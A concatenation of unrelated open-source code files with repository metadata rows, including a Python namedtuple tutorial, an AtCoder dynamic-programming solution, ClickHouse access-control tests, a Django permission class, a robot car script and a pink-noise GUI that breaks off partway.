class Duck:
    """Composition demo: a Duck is built from a bill and a tail component."""

    def __init__(self, bill, tail):
        self.bill = bill
        self.tail = tail

    def about(self):
        """Describe this duck's parts."""
        print('This duck has a {} bill and a {} tail'.format(
            self.bill.description, self.tail.length))
tail = Tail('long')
bill = Bill('wide orange')
duck = Duck(bill, tail)
duck.about()
# named tuple
# 命名元组的使用,三种初始化方法
Duck1 = namedtuple('Duck', 'bill tail')
duck1 = Duck1('wide orange', 'long')
print(duck1)
print(duck1.bill, duck1.tail)
# named tuple constructed by dictionary {}
parts = {'bill': 'wide orange', 'tail': 'long'} # **parts是关键词变量(keyword argument),抽取出key-value供Duck1()使用
duck2 = Duck1(**parts)
print(duck2)
# print(duck2.bill, duck2.tail)
duck3 = Duck1(bill='wide orange 3', tail='long 3') # 作用同上
print(duck3)
# print(duck3.bill, duck3.tail)
# 命名元组是不可变的,但是可以修改某些域的值并返回一个新的命名元组,不同于字典Dict
duck_dict = {'bill': 'wide orange', 'tail': 'long'}
duck_dict['color'] = 'red' # dict add new K-V pair
print(duck_dict)
# duck3.bill='test' # can't set attribute
duck4 = duck1._replace(bill='crushing', tail='magnificent')
print(duck4)
# duck4.color="red" # AttributeError: 'Duck' object has no attribute 'color'
# 命名元组的好处
Settings = namedtuple('App', 'AppName Version Author MD5Sign Major Minor Build')
my_app_settings = Settings('App1', '1.0', 'G8GG', 'xxxxxxxxxx', '1', '01', '1212')
print(my_app_settings.AppName)
Settings.AppName = "App2"
# Settings.
print(my_app_settings.AppName)
Point = namedtuple('Point', ['x', 'y'])
p = Point(11, y=12)
print(p)
x, y = p
print(x, y)
a = [{"a": "a"}, {"bb": 1}]
# print(a.)
import pandas as pd
# import numpy as np
tmp = pd.DataFrame(a)
# tmp.
| [
"fomalhaut@gmail.com"
] | fomalhaut@gmail.com |
8a2eb7cfab390a2f709d7eb3419c08fa0e6dd095 | 0eb599c3bbfa6e5b31516913b88cc9db3a1311ce | /ABC_6q/abc169f.py | ad9eed03c6ee61e3f204ed1ab80452f68d22e136 | [] | no_license | Linus-MK/AtCoder | 5b84dc88c2d2773d0f97ed18265d303290da7879 | a587e89a9e0c2ab4d36b09176bcc95e901e14326 | refs/heads/master | 2022-11-25T05:37:12.148722 | 2022-11-17T16:04:10 | 2022-11-17T16:04:10 | 169,840,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | n, s = list(map(int, input().split()))
nums = list(map(int, input().split()))
# dp[i][summ]: count (mod 998244353) of weighted subset choices over the
# first i numbers whose chosen elements sum to `summ`.  Each element left
# out of the sum contributes a factor of 2 (presumably counting the outer
# subset it may or may not belong to — ABC169 F semantics); picking nums[i]
# carries over dp[i][summ - nums[i]].
dp = [[0 for i in range(s+1)] for j in range(n+1)]
mod = 998244353
dp[0][0] = 1
for i in range(n):
    for summ in range(s+1):
        if summ - nums[i] >= 0:
            dp[i+1][summ] = (2 * dp[i][summ] + dp[i][summ - nums[i]]) % mod
        else:
            dp[i+1][summ] = (2 * dp[i][summ]) % mod
# print(dp)
print(dp[n][s] % mod)
"13600386+Linus-MK@users.noreply.github.com"
] | 13600386+Linus-MK@users.noreply.github.com |
6cec2962afd83940865d9b5121ea405fb2a72374 | c5dae77bb3ec7b39dca5c5c0522e101c4cb6d5a8 | /rooms/permissions.py | 8e1b5f8ec4de3e3507e9a1b899d0fbe75120a6cc | [] | no_license | Parkyes90/airbnb-api | f0726018738aad8eaf4ea891bb3de076ad875a36 | f80864757433d0ea0421b2f47d2daab9cf02915f | refs/heads/master | 2023-04-28T21:53:31.687273 | 2022-12-24T01:38:24 | 2022-12-24T01:38:24 | 243,207,499 | 0 | 0 | null | 2023-08-17T17:23:51 | 2020-02-26T08:19:24 | Python | UTF-8 | Python | false | false | 320 | py | from rest_framework.permissions import BasePermission
class IsOwner(BasePermission):
    """Object-level permission that grants access only to the object's owner."""

    def has_object_permission(self, request, view, obj):
        # The model must expose a `user` field for the ownership check.
        if not hasattr(obj, "user"):
            raise Exception("해당 모델이 사용자 필드를 가지고 있지 않습니다.")
        return request.user == obj.user
| [
"parkyes90@gmail.com"
] | parkyes90@gmail.com |
f6a713af97406d8dfa4ac81eebb0b71130ec20fe | e80c5a1f6073a24d59bdce3bcf00935320502c13 | /tests/integration/test_create_user_and_login/test.py | e1bc99ca75bffdccc08e23e636441c376bede7d9 | [
"Apache-2.0"
] | permissive | manmitya/ClickHouse | 3284828935099dc395da41c7d6c81f506b04d144 | 85e260286651bd6151d1e18f6f7a5160df300cd0 | refs/heads/master | 2022-11-10T09:57:06.882929 | 2020-07-02T21:57:41 | 2020-07-02T21:57:41 | 276,752,421 | 0 | 0 | Apache-2.0 | 2020-07-02T21:55:36 | 2020-07-02T21:55:35 | null | UTF-8 | Python | false | false | 5,696 | py | import pytest
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
import re
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance')
@pytest.fixture(scope="module", autouse=True)
def started_cluster():
    """Module-scoped fixture: start the cluster, seed test.table, tear down after."""
    try:
        cluster.start()
        instance.query("CREATE DATABASE test")
        instance.query("CREATE TABLE test.table(x UInt32, y UInt32) ENGINE = MergeTree ORDER BY tuple()")
        instance.query("INSERT INTO test.table VALUES (1,5), (2,10)")
        yield cluster
    finally:
        cluster.shutdown()
@pytest.fixture(autouse=True)
def cleanup_after_test():
    """Drop the per-test users/tables after each test so tests stay independent."""
    try:
        yield
    finally:
        instance.query("DROP USER IF EXISTS A, B")
        instance.query("DROP TABLE IF EXISTS default.table")
def test_login():
    """Freshly created password-less users can log in and run queries."""
    instance.query("CREATE USER A")
    instance.query("CREATE USER B")
    assert instance.query("SELECT 1", user='A') == "1\n"
    assert instance.query("SELECT 1", user='B') == "1\n"
def test_grant_and_revoke():
    """GRANT SELECT enables reads; REVOKE removes the privilege again."""
    instance.query("CREATE USER A")
    assert "Not enough privileges" in instance.query_and_get_error("SELECT * FROM test.table", user='A')
    instance.query('GRANT SELECT ON test.table TO A')
    assert instance.query("SELECT * FROM test.table", user='A') == "1\t5\n2\t10\n"
    instance.query('REVOKE SELECT ON test.table FROM A')
    assert "Not enough privileges" in instance.query_and_get_error("SELECT * FROM test.table", user='A')
def test_grant_option():
    """A user can re-grant a privilege only when it was granted WITH GRANT OPTION."""
    instance.query("CREATE USER A")
    instance.query("CREATE USER B")
    instance.query('GRANT SELECT ON test.table TO A')
    assert instance.query("SELECT * FROM test.table", user='A') == "1\t5\n2\t10\n"
    # Without grant option, A cannot pass the privilege on.
    assert "Not enough privileges" in instance.query_and_get_error("GRANT SELECT ON test.table TO B", user='A')
    instance.query('GRANT SELECT ON test.table TO A WITH GRANT OPTION')
    instance.query("GRANT SELECT ON test.table TO B", user='A')
    assert instance.query("SELECT * FROM test.table", user='B') == "1\t5\n2\t10\n"
    instance.query('REVOKE SELECT ON test.table FROM A, B')
def test_introspection():
    """SHOW USERS / SHOW CREATE / SHOW GRANTS / SHOW ACCESS and the
    system.users / system.grants tables all reflect created users and grants."""
    instance.query("CREATE USER A")
    instance.query("CREATE USER B")
    instance.query('GRANT SELECT ON test.table TO A')
    instance.query('GRANT CREATE ON *.* TO B WITH GRANT OPTION')
    assert instance.query("SHOW USERS") == TSV([ "A", "B", "default" ])
    assert instance.query("SHOW CREATE USERS A") == TSV([ "CREATE USER A" ])
    assert instance.query("SHOW CREATE USERS B") == TSV([ "CREATE USER B" ])
    assert instance.query("SHOW CREATE USERS A,B") == TSV([ "CREATE USER A", "CREATE USER B" ])
    assert instance.query("SHOW CREATE USERS") == TSV([ "CREATE USER A", "CREATE USER B", "CREATE USER default IDENTIFIED WITH plaintext_password SETTINGS PROFILE default" ])
    assert instance.query("SHOW GRANTS FOR A") == TSV([ "GRANT SELECT ON test.table TO A" ])
    assert instance.query("SHOW GRANTS FOR B") == TSV([ "GRANT CREATE ON *.* TO B WITH GRANT OPTION" ])
    assert instance.query("SHOW GRANTS FOR A,B") == TSV([ "GRANT SELECT ON test.table TO A", "GRANT CREATE ON *.* TO B WITH GRANT OPTION" ])
    assert instance.query("SHOW GRANTS FOR B,A") == TSV([ "GRANT SELECT ON test.table TO A", "GRANT CREATE ON *.* TO B WITH GRANT OPTION" ])
    assert instance.query("SHOW GRANTS FOR ALL") == TSV([ "GRANT SELECT ON test.table TO A", "GRANT CREATE ON *.* TO B WITH GRANT OPTION", "GRANT ALL ON *.* TO default WITH GRANT OPTION" ])
    # Each user sees only their own grants.
    assert instance.query("SHOW GRANTS", user='A') == TSV([ "GRANT SELECT ON test.table TO A" ])
    assert instance.query("SHOW GRANTS", user='B') == TSV([ "GRANT CREATE ON *.* TO B WITH GRANT OPTION" ])
    expected_access1 = "CREATE USER A\n"\
                       "CREATE USER B\n"\
                       "CREATE USER default IDENTIFIED WITH plaintext_password SETTINGS PROFILE default"
    expected_access2 = "GRANT SELECT ON test.table TO A\n"\
                       "GRANT CREATE ON *.* TO B WITH GRANT OPTION\n"\
                       "GRANT ALL ON *.* TO default WITH GRANT OPTION\n"
    assert expected_access1 in instance.query("SHOW ACCESS")
    assert expected_access2 in instance.query("SHOW ACCESS")
    # system tables: "\N" is ClickHouse's TSV representation of NULL.
    assert instance.query("SELECT name, storage, auth_type, auth_params, host_ip, host_names, host_names_regexp, host_names_like, default_roles_all, default_roles_list, default_roles_except from system.users WHERE name IN ('A', 'B') ORDER BY name") ==\
           TSV([[ "A", "disk", "no_password", "[]", "['::/0']", "[]", "[]", "[]", 1, "[]", "[]" ],
                [ "B", "disk", "no_password", "[]", "['::/0']", "[]", "[]", "[]", 1, "[]", "[]" ]])
    assert instance.query("SELECT * from system.grants WHERE user_name IN ('A', 'B') ORDER BY user_name, access_type, grant_option") ==\
           TSV([[ "A", "\N", "SELECT", "test", "table", "\N", 0, 0 ],
                [ "B", "\N", "CREATE", "\N", "\N", "\N", 0, 1 ]])
def test_current_database():
    """A grant given with a relative table name resolves against the current database."""
    instance.query("CREATE USER A")
    instance.query("GRANT SELECT ON table TO A", database="test")
    assert instance.query("SHOW GRANTS FOR A") == TSV([ "GRANT SELECT ON test.table TO A" ])
    assert instance.query("SHOW GRANTS FOR A", database="test") == TSV([ "GRANT SELECT ON test.table TO A" ])
    assert instance.query("SELECT * FROM test.table", user='A') == "1\t5\n2\t10\n"
    assert instance.query("SELECT * FROM table", user='A', database='test') == "1\t5\n2\t10\n"
    # The grant is on test.table only: an identically named default.table stays off-limits.
    instance.query("CREATE TABLE default.table(x UInt32, y UInt32) ENGINE = MergeTree ORDER BY tuple()")
    assert "Not enough privileges" in instance.query_and_get_error("SELECT * FROM table", user='A')
| [
"vitbar@yandex-team.ru"
] | vitbar@yandex-team.ru |
ec400920cda9509c5c17882288afd3c75cf06cba | 73da198ccfca2d0d77b7c48399fc051d180cdeb6 | /main.py | 82672ba635aa06e8f148a83eb7fbb92557b4535f | [] | no_license | nfsrules/AxionautV1 | 186a2f397ec903a8ab27eecebbb9c8dee973d7c8 | 2fbd69ae1d5c880bca47363bb8460e7d97d0aa00 | refs/heads/master | 2020-03-07T14:54:39.769936 | 2018-04-09T08:56:02 | 2018-04-09T08:56:02 | 127,539,420 | 1 | 0 | null | 2018-03-31T14:30:08 | 2018-03-31T14:30:07 | null | UTF-8 | Python | false | false | 3,723 | py | # coding=utf-8
import os
import sys
sys.path.append('Modules/')
sys.path.append('Databases/')
sys.path.append('Architectures/')
sys.path.append('Models/')
from utils import load_autopilot, get_commands, plot_train_loss
import architectures
import vehicles
import argparse
import warnings
warnings.filterwarnings("ignore")
models_path = '/Models'
parser = argparse.ArgumentParser(description='Axionaut')
parser.add_argument('--mode', default='self_driving', help='self_driving, records or training') # PoSelf driving, Record, Training
parser.add_argument('--architecture', default='ConvNets', help='ConvNets or ConvLSTM')
parser.add_argument('--tl', default='transfer_learning', help='Weights initialization - Random or Transfer Learning')
parser.add_argument('-e', '--epochs', default=150, type=int)
parser.add_argument('-b', '--batch_size', default=64, type=int)
parser.add_argument('-op', '--optimizer', default='Adam')
args = parser.parse_args()
if (args.mode == 'self_driving'):
print('Vehicle started in self driving mode.')
# Load self-driving pre-train model
model, graph = load_autopilot('autopilot.hdf5')
print('Model loaded...')
# Create Axionaut car with default settings
axionaut = vehicles.Axionaut()
# Configure PDW control commands as default
axionaut.commands = get_commands(path=None, default=True)
# Test camera position
axionaut.camera_test()
print('Hardware configured...')
# Set Axionaut to auto pilot mode / Wrap driving model to vehicle
axionaut.autopilot(model, graph)
# Start Axtionaut :)
raw_input('Self self_driving started. Pres any key to start driving. Press Crtl + C to exit.')
axionaut.start()
elif(args.mode == 'training'):
print('Vehicle started in training mode.')
# Create Axionaut car with default settings
axionaut = Axionaut()
# Configure PDW control commands as default
axionaut.commands = get_commands(path=None, default=True)
# Training mode started with Transfer Learning
if (args.tl == True):
# Load self-driving pre-trained model
model, graph = load_model('autopilot.hdf5')
# Freeze all convolutional layers
for layer in model.layers:
layer.trainable = False
# Training routine
print('Training routine started with transfer learning. Press Crtl + C to exit.')
history = axionaut.train(model, graph, transfer_learning=True,
epochs=args.epochs,
batch_size=args.batch_size,
optimizer=args.optimizer)
utils.plot_train_loss(history)
print('trained finished. Best model saved')
else:
if args.arch == 'ConvNets':
# Create a new ConvNet model from library
model = architectures.ConvNets()
# Train model
history = model.train(model, graph, transfer_learning=True,
epochs=args.epochs,
batch_size=args.batch_size,
optimizer=args.optimizer)
utils.plot_train_loss(history)
print('trained finished. Best model saved')
else:
# Create a new ConvNet model from library
model = architectures.ConvNets()
# Train model
history = model.train(model, graph, transfer_learning=True,
epochs=args.epochs,
batch_size=args.batch_size,
optimizer=args.optimizer)
print('Architecture ConvLSTM')
else:
print('Vehicle started in Record model')
| [
"nelson.fernandez@axionable.com"
] | nelson.fernandez@axionable.com |
a84b905e0ab1f6527347ae02f73f29c344cdc327 | 243833b82131b1d45d54df72a1a6772f5497c904 | /Tree/matrix to Tree.py | 27966c2362042228f939a9533e737b10bbfed901 | [] | no_license | Kumarved123/Basic-Data-Structure-Algorithm | e0c874c5ef2b5617449496887226d2816428e5ef | f2ba838472a484e982848dff3ee44cd38cd669cd | refs/heads/master | 2020-05-19T03:15:45.289941 | 2020-01-19T17:06:43 | 2020-01-19T17:06:43 | 184,795,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 928 | py | class Node:
def __init__(self, data):
self.data = data
self.left = None
self.right = None
def findroot(matrix):
    """Return the index of the root row (the first all-zero row), else None."""
    size = len(matrix)
    empty_row = [0] * size
    for idx in range(size):
        if matrix[idx] == empty_row:
            return idx
def Tree(matrix):
    """Build a binary tree from an adjacency matrix and return its root Node.

    Convention (chosen to be consistent with findroot): matrix[i][j] == 1
    means node j is the parent of node i, so the root is the node whose row
    is all zeros.  The first child discovered becomes .left, the second
    .right (assumes at most two children per node).
    Fixes vs. original: Tree never returned anything; dfsUtil referenced
    `s.right` on an int, dropped the `root` argument in one recursive call,
    never popped exhausted nodes, and scanned rows for children, which
    contradicted findroot's all-zero-row definition of the root.
    """
    root_index = findroot(matrix)
    if root_index is None:
        return None
    return DFS(matrix, root_index)

def dfsUtil(matrix, stack, n, root):
    """Recursively attach the unvisited children of the stack's top node."""
    if len(stack) == 0:
        return
    s = stack[-1]
    # Children of s are the nodes i with matrix[i][s] == 1 (column scan).
    i = 0
    while i < n and matrix[i][s] != 1:
        i += 1
    if i < n:
        matrix[i][s] = 0          # mark this edge as visited
        stack.append(i)
        child = Node(i)
        if root.left is None:     # first child goes left, second goes right
            root.left = child
        else:
            root.right = child
        dfsUtil(matrix, stack, n, child)   # explore the subtree under child
        dfsUtil(matrix, stack, n, root)    # then look for more children of s
    else:
        stack.pop()               # s is exhausted; backtrack

def DFS(matrix, s):
    """Depth-first tree construction starting at node index s; returns the root Node."""
    root = Node(s)
    n = len(matrix)
    stack = []
    stack.append(s)
    dfsUtil(matrix, stack, n, root)
    return root
| [
"vkumar@ar.iitr.ac.in"
] | vkumar@ar.iitr.ac.in |
9be35d2a711c8eb0700d7ddfc54912967c9d4596 | ff81a9d7880f1b85a1dc19d5eba5ac72d7179c86 | /pychron/options/views/flux_visualization_views.py | 208b66906956dcd975359ab479acc112319b92dd | [
"Apache-2.0"
] | permissive | UManPychron/pychron | 2fb7e479a9f492423c0f458c70102c499e1062c4 | b84c9fd70072f9cbda30abe2c471e64fe3dd75d8 | refs/heads/develop | 2022-12-03T23:32:45.579326 | 2020-01-29T19:02:20 | 2020-01-29T19:02:20 | 36,100,637 | 0 | 0 | null | 2015-05-23T00:10:06 | 2015-05-23T00:10:05 | null | UTF-8 | Python | false | false | 2,220 | py | # ===============================================================================
# Copyright 2015 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from chaco.default_colormaps import color_map_name_dict
from traitsui.api import Item, HGroup, VGroup, EnumEditor
from pychron.options.options import SubOptions, AppearanceSubOptions
class FluxVisualizationSubOptions(SubOptions):
    """Main options pane for flux visualization: plot kind and model kind selectors."""
    def traits_view(self):
        grp = VGroup(Item('plot_kind'),
                     Item('model_kind'))
        return self._make_view(grp)
class FluxVisualizationAppearanceSubOptions(AppearanceSubOptions):
    """Appearance pane: 2D colormap/levels, 1D marker size, and display-only flux scale."""
    def traits_view(self):
        # Shown only for 2D plots: colormap choice plus contour level count.
        twodgrp = VGroup(HGroup(Item('color_map_name',
                                     label='Color Map',
                                     editor=EnumEditor(values=sorted(color_map_name_dict.keys()))),
                                Item('levels')),
                         visible_when='plot_kind=="2D"',
                         label='Options',
                         show_border=True)
        # Shown only for 1D plots.
        onedgrp = VGroup(Item('marker_size'),
                         visible_when='plot_kind=="1D"',
                         label='Options',
                         show_border=True)
        # Multiplier applied to displayed flux values only (not to stored data).
        scalegrp = VGroup(Item('flux_scalar', label='Scale', tooltip='Multiple flux by Scale. FOR DISPLAY ONLY'))
        return self._make_view(VGroup(twodgrp, onedgrp, scalegrp))
VIEWS = {'main': FluxVisualizationSubOptions,
'appearance': FluxVisualizationAppearanceSubOptions}
# ============= EOF =============================================
| [
"jirhiker@gmail.com"
] | jirhiker@gmail.com |
1cb53ce92897d65d05b8eb78e9534d4bee7e0ba5 | 0fd9644616b5658ea960ef86f28b94cc95ce55e0 | /djangoprj/mikrotik/migrations/0005_mtusers.py | 744c7b72dff4e87a2d85c4bf78cfde2cdfeb1802 | [] | no_license | zdimon/time-control | f4db6f26f15a18c89b91dba3f69a696a9d3a6c28 | 3a212d26dcaae13d3ca5a18247a425f63938fd7c | refs/heads/master | 2020-05-13T16:33:53.011992 | 2019-04-19T07:05:01 | 2019-04-19T07:05:01 | 181,640,210 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 631 | py | # Generated by Django 2.2 on 2019-04-17 07:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mikrotik', '0004_auto_20190417_0640'),
]
operations = [
migrations.CreateModel(
name='MTUsers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ip', models.CharField(max_length=250)),
('host', models.CharField(max_length=250)),
('mac', models.CharField(max_length=250)),
],
),
]
| [
"zdimon@example.com"
] | zdimon@example.com |
ccbb30f2c4537be943b2123987f1b949590019ab | 4fd5415bc03bd03ecfd44bfc4160a2f7712b594e | /build/rosserial_embeddedlinux/catkin_generated/pkg.installspace.context.pc.py | ff6f007b1e60d030a434f140b8946315d75348c3 | [] | no_license | z0sani/R-York | 772beb715edbb942882dcf43cb9cd8c090f5d2cf | bac7758c2b89764e3208e5899d2b3c8820af370a | refs/heads/master | 2020-03-28T06:31:17.660568 | 2018-09-07T15:35:30 | 2018-09-07T15:35:30 | 147,840,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rosserial_embeddedlinux"
PROJECT_SPACE_DIR = "/home/swarmie/RMC/install"
PROJECT_VERSION = "0.7.7"
| [
"matthew@fricke.co.uk"
] | matthew@fricke.co.uk |
caa434acc7d304b0c285e9a771010088d560dbc5 | d3efc82dfa61fb82e47c82d52c838b38b076084c | /Autocase_Result/ReverseRepo/YW_NHG_SHHG_019_GC003.py | 9f23f2cae281cc74a7cff9d8df2f7abdba2b90e2 | [] | no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,025 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_NHG_SHHG_019_GC003(xtp_test_case):
    """Shanghai reverse repo: sell exactly 1,000,000 units of GC003 (3-day
    repo), expecting the order to be fully filled."""
    # YW_NHG_SHHG_019_GC003
    def test_YW_NHG_SHHG_019_GC003(self):
        # Title: "SH reverse repo -- quantity (== 1,000,000 units) -- 3 days"
        title = '上海逆回购--数量(等于100万张)-3天'
        # Expected outcome for this test case.
        # Possible order states: initial, untraded, partly traded, fully traded,
        # partial-cancel reported, partly cancelled, reported pending cancel,
        # cancelled, rejected, cancel-rejected, internally cancelled.
        # xtp_ID and cancel_xtpID default to 0 and need not be changed.
        case_goal = {
            '期望状态': '全成',
            'errorID': 0,
            'errorMSG': '',
            '是否生成报单': '是',
            '是否是撤废': '否',
            'xtp_ID': 0,
            'cancel_xtpID': 0,
        }
        logger.warning(title)
        # Build the order parameters. ------------------------------------------
        # Args: ticker, market, security type, security status, trading status,
        # side (B buy / S sell), expected state, Api.
        stkparm = QueryStkPriceQty('204003', '1', '12', '2', '0', 'S', case_goal['期望状态'], Api)
        # If fetching the order parameters failed, the test case fails.
        if stkparm['返回结果'] is False:
            rs = {
                '用例测试结果': stkparm['返回结果'],
                '测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
            }
            self.assertEqual(rs['用例测试结果'], True)
        else:
            wt_reqs = {
                'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_REPO'],
                'order_client_id':2,
                'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
                'ticker': stkparm['证券代码'],
                'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
                'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
                'price': stkparm['随机中间价'],
                'quantity': 1000000,
                'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
            }
            ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
            CaseParmInsertMysql(case_goal, wt_reqs)
            rs = serviceTest(Api, case_goal, wt_reqs)
            logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
                           + str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
            self.assertEqual(rs['用例测试结果'], True)  # 0
if __name__ == '__main__':
unittest.main()
| [
"418033945@qq.com"
] | 418033945@qq.com |
226311f958f485ae3e09e79dde03c03782a6b7fc | 2f0e14f919dd01aad3e48c5543c81eb3c5c5a348 | /apitest/__init__.py | 536c4e7f37cc1eee633b9948289f1996162f3dc2 | [] | no_license | wangzhatian/DjangoDemo | d6542d4ebf54e05b19dc8d56127931b46d48b386 | 4471c59ab32f76a0f21df1ac3fb03ca60f5a0ff1 | refs/heads/master | 2020-12-03T14:45:22.588169 | 2020-12-03T09:40:15 | 2020-12-03T09:40:15 | 231,358,892 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 47 | py | default_app_config="apitest.apps.ApitestConfig" | [
"17630366020@163.com"
] | 17630366020@163.com |
b39aaecd5ccb3f941f78537dc62d06709bf9d156 | dafbe82a8b21323e28b0912ad0896f504ba5fc7a | /4/is_palindrome_list.py | b575ba9996dab433a0243d1548c0a8137c7b6238 | [] | no_license | lxyshuai/Algorithm-primary-class-python | 4598d857eeff8f65af1ba42e13f72b7c16ab1fae | 36730e37a920459ca9e1d923611160f6346f4131 | refs/heads/master | 2020-03-28T10:58:37.562337 | 2018-10-14T11:57:46 | 2018-10-14T11:57:46 | 148,165,013 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,632 | py | # coding=utf8
"""
判断一个链表是否为回文结构
【题目】
给定一个链表的头节点head,请判断该链表是否为回文结构。
例如:
1->2->1,返回true。
1->2->2->1,返回true。
15->6->15,返回true。
1->2->3,返回false。
进阶:
如果链表长度为N,时间复杂度达到O(N),额外空间复杂度达到O(1)。
"""
class Node(object):
    """A singly linked list node holding an arbitrary value."""

    def __init__(self, value, next_node=None):
        """Create a node.

        :param value: payload stored in the node.
        :param next_node: optional successor node (defaults to None, i.e.
            the node is created as a list tail). Backward compatible with
            the original single-argument form ``Node(value)``.
        """
        self.value = value
        self.next = next_node
def is_palindrome(head):
    """Return True if the linked list starting at ``head`` is a palindrome.

    Runs in O(n) time and O(1) extra space: the second half of the list is
    reversed in place for the comparison and then reversed back, so the
    caller's list is left in its original order. (The previous version left
    the list permanently mutated, with the second half reversed.)

    :param head: first node of the list, or None for an empty list.
    :return: True for empty / single-node / palindromic lists, else False.
    """
    if head is None or head.next is None:
        return True

    # Advance `slow` to the end of the first half while `fast` moves two
    # steps per iteration. The `and` order matters: testing fast.next first
    # protects the fast.next.next access from an AttributeError.
    slow = head
    fast = head
    while fast.next is not None and fast.next.next is not None:
        fast = fast.next.next
        slow = slow.next

    # Detach and reverse the second half of the list.
    second = _reverse_list(slow.next)
    slow.next = None

    # Walk both halves in lockstep; the reversed half is never longer than
    # the first half, so it controls termination on mismatch-free input.
    result = True
    left, right = head, second
    while left is not None and right is not None:
        if left.value != right.value:
            result = False
            break
        left = left.next
        right = right.next

    # Restore the original list structure before returning.
    slow.next = _reverse_list(second)
    return result


def _reverse_list(node):
    """Reverse the list starting at ``node`` in place; return the new head."""
    prev = None
    while node is not None:
        nxt = node.next
        node.next = prev
        prev = node
        node = nxt
    return prev
if __name__ == '__main__':
    # Smoke test: build the palindrome 1 -> 2 -> 3 -> 2 -> 1 and check it.
    head = Node(1)
    head.next = Node(2)
    head.next.next = Node(3)
    head.next.next.next = Node(2)
    head.next.next.next.next = Node(1)
    # Parenthesized call so this runs under both Python 2 and Python 3
    # (the original `print is_palindrome(head)` statement is a syntax
    # error on Python 3).
    print(is_palindrome(head))
| [
"kobexyluo@tencent.com"
] | kobexyluo@tencent.com |
a74807dd1e81c528164b688e80edeb4cc803d732 | e16c4a24c3bf0ea0db23935c645381c59670b029 | /experiments/python/vibrationdata_gui_python_4_6_15/vb_pink_noise_gui.py | ddfb68c5e8df9f38d4674fa2e8f6f18fdfcf3a1c | [] | no_license | ceramicspeed/vibrationanalysis | 6b00efa39eb4430e596235b4302f2803606c8d8d | 248500f40e4aed886eb2732f86654c0f138c8e93 | refs/heads/master | 2021-01-25T05:56:10.450358 | 2017-04-05T15:44:32 | 2017-04-05T15:44:32 | 80,701,922 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,891 | py | ################################################################################
# program: vb_pink_noise_gui.py
# author: Tom Irvine
# Email: tom@vibrationdata.com
# version: 1.2
# date: September 5, 2014
# description: Generate pink noise
#
################################################################################
#
# Note: for use within Spyder IDE, set:
#
# Run > Configuration > Interpreter >
#
# Excecute in an external system terminal
#
################################################################################
from __future__ import print_function
import sys
if sys.version_info[0] == 2:
print ("Python 2.x")
import Tkinter as tk
from tkFileDialog import asksaveasfilename
if sys.version_info[0] == 3:
print ("Python 3.x")
import tkinter as tk
from tkinter.filedialog import asksaveasfilename
from scipy.signal import lfilter
from numpy import histogram,pi,tan,cos,sin,zeros,std,sqrt,flipud,complex128
import matplotlib.pyplot as plt
from vb_utilities import WriteData2,signal_stats
from scipy.fftpack import fft,ifft
import random
class vb_pink_noise:
    """Tkinter GUI that synthesizes band-limited pink noise.

    The user enters a standard deviation, duration, sample rate and an
    optional low-pass frequency; `calculation` generates white Gaussian
    noise, shapes its spectrum with a 1/sqrt(f)-style transfer function,
    optionally applies a sixth-order Butterworth low-pass, plots the time
    history plus a histogram, and enables export of the samples to a file.
    """

    def __init__(self, parent):
        """Build all widgets inside `parent` (the Tk root window)."""
        self.master=parent # store the parent
        top = tk.Frame(parent) # frame for all class widgets
        top.pack(side='top') # pack frame in parent's window
        self.master.minsize(400,400)
        self.master.geometry("500x500")
        self.master.title("vb_pink_noise_gui.py ver 1.2 by Tom Irvine")

        # Result buffers filled in by calculation(): time axis and samples.
        self.TT=[]
        self.a =[]
        self.np=0
        self.lpf=0

        # `crow` is the current grid row as widgets are laid out top-down.
        crow=0
        self.hwtext1=tk.Label(top,text='Generate Pink Noise')
